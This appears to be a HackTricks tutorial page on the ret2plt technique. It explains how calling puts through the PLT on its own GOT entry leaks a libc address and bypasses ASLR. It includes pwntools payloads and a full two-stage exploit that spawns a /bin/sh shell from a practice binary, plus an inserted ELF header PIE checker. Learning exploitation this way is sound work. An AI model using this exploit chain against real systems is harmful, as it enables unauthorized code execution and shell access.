Ret2plt

tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Basic Information

The goal of this technique is to leak the address of a function through the PLT in order to bypass ASLR. If, for example, you leak the runtime address of libc's puts, you can compute the libc base and, from that, the offsets to other functions such as system.

This can be done with a pwntools payload such as the following (from here):

```python
# 32-bit ret2plt: arguments are passed on the stack, so the layout is
# return address (puts@plt), then puts' own return address (main),
# then puts' argument (the GOT entry of puts).
payload = flat(
    b'A' * padding,      # padding = distance to the saved return address
    elf.plt['puts'],
    elf.symbols['main'],
    elf.got['puts']
)

# 64-bit: the first argument travels in RDI, so a `pop rdi; ret` gadget
# (POP_RDI) loads the GOT entry before puts@plt is called.
payload = flat(
    b'A' * padding,
    POP_RDI,
    elf.got['puts'],
    elf.plt['puts'],
    elf.symbols['main']
)
```

Note how puts (called through its PLT stub) is given the address of puts' entry in the GOT (Global Offset Table) as its argument. When puts prints that GOT entry, the bytes it emits are the real address of puts in memory, because the GOT slot holds the resolved libc address.

Also note how the address of main is placed as the return address, so that when puts finishes the binary jumps back into main instead of exiting; the process keeps running and the leaked address stays valid for the second stage.

caution

Note that for this to work the binary must not be compiled with PIE, or you must already have a leak that defeats PIE, so that the addresses of the PLT, the GOT and main are known. Otherwise you need to bypass PIE first.
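As an added example (not code from the original page), the PIE condition stated in the caution above can be checked directly from a binary's ELF header, since PIE executables are marked ET_DYN while fixed-address executables are ET_EXEC. The names `is_pie` and `make_header` are chosen here, and the headers `make_header` builds are constructed test data, not real binaries.

```python
import struct
import sys

ELF_MAGIC = b"\x7fELF"
ET_EXEC, ET_DYN = 2, 3   # e_type values from the ELF specification


def is_pie(elf_bytes: bytes) -> bool:
    """Return True if the ELF header marks the file as position-independent.

    A ret2plt chain built from elf.plt / elf.got / main as fixed constants
    only works against ET_EXEC binaries; for ET_DYN (PIE) the loader picks
    a random base, so those addresses change on every run.
    """
    if len(elf_bytes) < 18 or elf_bytes[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    ei_class = elf_bytes[4]   # 1 = ELFCLASS32, 2 = ELFCLASS64
    ei_data = elf_bytes[5]    # 1 = little-endian, 2 = big-endian
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        raise ValueError("unsupported EI_CLASS/EI_DATA")
    endian = "<" if ei_data == 1 else ">"
    # e_type is the 16-bit field immediately after the 16-byte e_ident,
    # so its offset is the same for 32- and 64-bit files.
    (e_type,) = struct.unpack_from(endian + "H", elf_bytes, 16)
    return e_type == ET_DYN


def make_header(e_type: int, bits: int = 64, little: bool = True) -> bytes:
    """Constructed minimal ELF header (e_ident + e_type/e_machine/e_version)
    used only to exercise is_pie offline; it is not a loadable binary."""
    ei_class = 2 if bits == 64 else 1
    ei_data = 1 if little else 2
    e_ident = ELF_MAGIC + bytes([ei_class, ei_data, 1, 0]) + b"\x00" * 8
    e_machine = 0x3E if bits == 64 else 0x03   # EM_X86_64 / EM_386
    endian = "<" if little else ">"
    return e_ident + struct.pack(endian + "HHI", e_type, e_machine, 1)


if __name__ == "__main__":
    # Usage: python check_pie.py ./vuln-32
    with open(sys.argv[1], "rb") as f:
        header = f.read(64)
    if is_pie(header):
        print("PIE (ET_DYN): PLT/GOT/main addresses are randomized")
    else:
        print("no PIE (ET_EXEC): PLT/GOT/main addresses are fixed")
```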

You can find a full example of this bypass here. This was the final exploit from that example:

```python
from pwn import *

elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()

p.recvline()

# Stage 1: return into puts@plt with puts' GOT entry as the argument,
# then return to main so the process survives for stage 2.
payload = flat(
    b'A' * 32,
    elf.plt['puts'],
    elf.sym['main'],
    elf.got['puts']
)

p.sendline(payload)

# The first 4 bytes puts prints are the resolved address of puts in libc.
puts_leak = u32(p.recv(4))
p.recvlines(2)

# libc base = leaked address - offset of puts inside libc
libc.address = puts_leak - libc.sym['puts']
log.success(f'LIBC base: {hex(libc.address)}')

# Stage 2: ret2libc with the now-known libc base.
payload = flat(
    b'A' * 32,
    libc.sym['system'],
    libc.sym['exit'],
    next(libc.search(b'/bin/sh\x00'))
)

p.sendline(payload)

p.interactive()
```

Other Examples & References
